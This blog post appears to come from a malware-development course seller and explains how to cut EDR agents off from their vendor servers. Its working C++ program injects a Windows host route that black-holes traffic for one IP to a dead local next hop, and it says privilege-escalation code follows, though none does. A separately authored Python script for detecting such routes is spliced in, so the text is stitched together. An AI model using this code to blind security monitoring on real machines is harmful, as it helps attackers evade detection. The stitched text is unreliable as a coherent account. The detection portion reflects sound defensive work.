Blocking EDR Outgoing Connections Using the Routing Table
Welcome to this new post! Today, we’ll explore how to block connections from Endpoint Detection and Response (EDR) systems to their external servers, specifically those operated by the EDR provider. We’ll accomplish this by manipulating the system’s routing table, effectively preventing the EDR software from communicating with the company’s remote servers. This method can be useful in various scenarios, such as testing, security assessments, or controlling network traffic.
Our Malware Development Text Modules subscription is finally here! Dive deep into Windows OS malware techniques, from beginner to advanced, all in C++.
- New module every 15 days
- Over 45 minutes of reading time per module
- Starting at just $5/month
Also here you have my first course, which is basically an Introduction to Windows Malware Development using C++. It’s available from $15.
Code
One of the worst things about this technique is that you need to execute this code with administrator privileges, but you are lucky because I have some code to escalate privileges like this:
Code from:
#include <winsock2.h>
#include <ws2tcpip.h>
#include <iphlpapi.h>
#include <stdio.h>
#include <string.h> // memset
#pragma comment(lib, "iphlpapi.lib")
#pragma comment(lib, "ws2_32.lib")

// Build an IPv4 address in network byte order (little-endian host), as the
// MIB_IPFORWARDROW fields expect it.
#define IPCONV(a,b,c,d) (((a)&0xff) | ((b)&0xff)<<8 | ((c)&0xff)<<16 | ((d)&0xff)<<24)

int main(int argc, char** argv) {
    DWORD dwStatus = 0;
    MIB_IPFORWARDROW row;

    // Zero out the structure so unused fields (policy, type, age, AS) are 0
    memset(&row, 0, sizeof(MIB_IPFORWARDROW));

    // DESTINATION ADDRESS: the single host we want to black-hole
    row.dwForwardDest = IPCONV(8, 8, 8, 8);        // 8.8.8.8
    // DESTINATION MASK: /32, so only that one host is affected
    row.dwForwardMask = 0xFFFFFFFF;                // 255.255.255.255
    // NEXT HOP: an address on the local subnet where no host answers
    row.dwForwardNextHop = IPCONV(192, 168, 1, 119); // 192.168.1.119
    // Interface index of the Ethernet adapter (hard-coded here; check it
    // against "route print" or GetAdaptersInfo on the target machine)
    row.dwForwardIfIndex = 12;
    // Protocol: route added by network management (same as "route add")
    row.dwForwardProto = MIB_IPPROTO_NETMGMT;
    // Metric: low value so this route wins over the default route
    row.dwForwardMetric1 = 1;

    // Add the new route to the routing table (requires administrator rights)
    dwStatus = CreateIpForwardEntry(&row);
    if (dwStatus == NO_ERROR)
        printf("New route successfully injected\n");
    else if (dwStatus == ERROR_INVALID_PARAMETER)
        printf("Invalid parameter.\n");
    else if (dwStatus == ERROR_NOT_FOUND)
        printf("Element not found.\n");
    else
        printf("Error: %lu\n", dwStatus); // DWORD is unsigned long
    return 0;
}
We are modifying the system’s routing table to block network traffic to a specific IP address. The program sets up a new host route that directs any traffic destined for 8.8.8.8 (Google DNS) to a different, non-existent next hop on the local subnet (192.168.1.119). Because no host answers at that next hop, the packets are never delivered, which effectively blocks the connection. The program uses Windows-specific libraries to access and manipulate the routing table, and it reports whether the new route was successfully added or an error occurred.
When you execute this code and look at the routing table with this command:
route print
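From the defender’s side, the route injected above is easy to spot in that same `route print` output: a /32 host route for an off-subnet destination whose gateway is neither “On-link” nor the default gateway, usually with a very low metric. The following script is an added example (not code from the original post) that parses a constructed sample of the IPv4 route table and flags such routes; it also records whether the suspicious next hop sits inside a directly connected subnet, which is the black-hole pattern this post describes. The sample text, the function names and the checks are all mine.

```python
"""Flag suspicious IPv4 host routes in Windows `route print` output."""
import ipaddress
import re

# Constructed sample of `route print` output. The last active route mirrors the
# one the post's program injects: 8.8.8.8/32 via 192.168.1.119 with metric 1.
SAMPLE_ROUTE_PRINT = """\
===========================================================================
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0      192.168.1.1    192.168.1.50     25
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    331
      192.168.1.0    255.255.255.0         On-link      192.168.1.50    281
     192.168.1.50  255.255.255.255         On-link      192.168.1.50    281
          8.8.8.8  255.255.255.255    192.168.1.119    192.168.1.50      1
===========================================================================
Persistent Routes:
  None
"""

# destination, netmask, gateway, interface, metric (metric must be numeric,
# so the column header line never matches)
ROUTE_LINE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")


def parse_routes(text):
    """Return the rows of the 'Active Routes' section as dicts."""
    routes = []
    in_active = False
    for line in text.splitlines():
        if line.startswith("Active Routes:"):
            in_active = True
            continue
        if line.startswith("Persistent Routes:"):
            break
        if not in_active:
            continue
        m = ROUTE_LINE.match(line)
        if not m:
            continue
        dest, mask, gateway, iface, metric = m.groups()
        routes.append({"dest": dest, "mask": mask, "gateway": gateway,
                       "interface": iface, "metric": int(metric)})
    return routes


def find_suspicious_host_routes(routes):
    """Flag /32 routes whose next hop is neither On-link nor the default
    gateway and whose destination lies outside every connected subnet.

    Each finding also says whether the next hop is on a local subnet, i.e.
    whether traffic is being steered to an address that can simply not answer.
    """
    default_gw = next((r["gateway"] for r in routes if r["dest"] == "0.0.0.0"),
                      None)
    # Directly connected subnets are the On-link routes that are not /32 hosts
    local_nets = [
        ipaddress.ip_network(f"{r['dest']}/{r['mask']}", strict=False)
        for r in routes
        if r["gateway"] == "On-link" and r["mask"] != "255.255.255.255"
    ]
    findings = []
    for r in routes:
        if r["mask"] != "255.255.255.255":
            continue                       # only host routes are of interest
        if r["gateway"] in ("On-link", default_gw):
            continue                       # normal local or default-gw routes
        dest = ipaddress.ip_address(r["dest"])
        if any(dest in net for net in local_nets):
            continue                       # host on our own LAN, not off-subnet
        gw = ipaddress.ip_address(r["gateway"])
        findings.append({**r, "gateway_on_local_subnet":
                         any(gw in net for net in local_nets)})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_host_routes(parse_routes(SAMPLE_ROUTE_PRINT)):
        print(f"suspicious host route: {f['dest']} via {f['gateway']} "
              f"metric {f['metric']} "
              f"(next hop on local subnet: {f['gateway_on_local_subnet']})")
```

On a live machine the same logic can be run against the output of `route print` (or the objects returned by `Get-NetRoute`, which additionally expose the route protocol), and a flagged entry is removed with `route delete <destination>`; a route like this reappearing after removal is itself a strong signal that something on the host is re-adding it.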
Conclusions
In this article, we demonstrated how to block Endpoint Detection and Response (EDR) outgoing connections by manipulating the system’s routing table. By redirecting traffic intended for specific external servers to a non-existent IP address, we effectively prevent the EDR software from communicating with its provider’s servers. This approach can be valuable for various purposes, including security assessments, network traffic control, and testing environments where controlling EDR behavior is crucial.
We also noted that implementing this technique requires administrative privileges and careful handling of network configuration. The provided code uses Windows-specific libraries to modify the routing table and offers feedback on the success or failure of the route addition. While this method offers a direct way to influence EDR communication, it’s important to apply such techniques responsibly and within ethical boundaries, ensuring compliance with applicable regulations and best practices.
S12.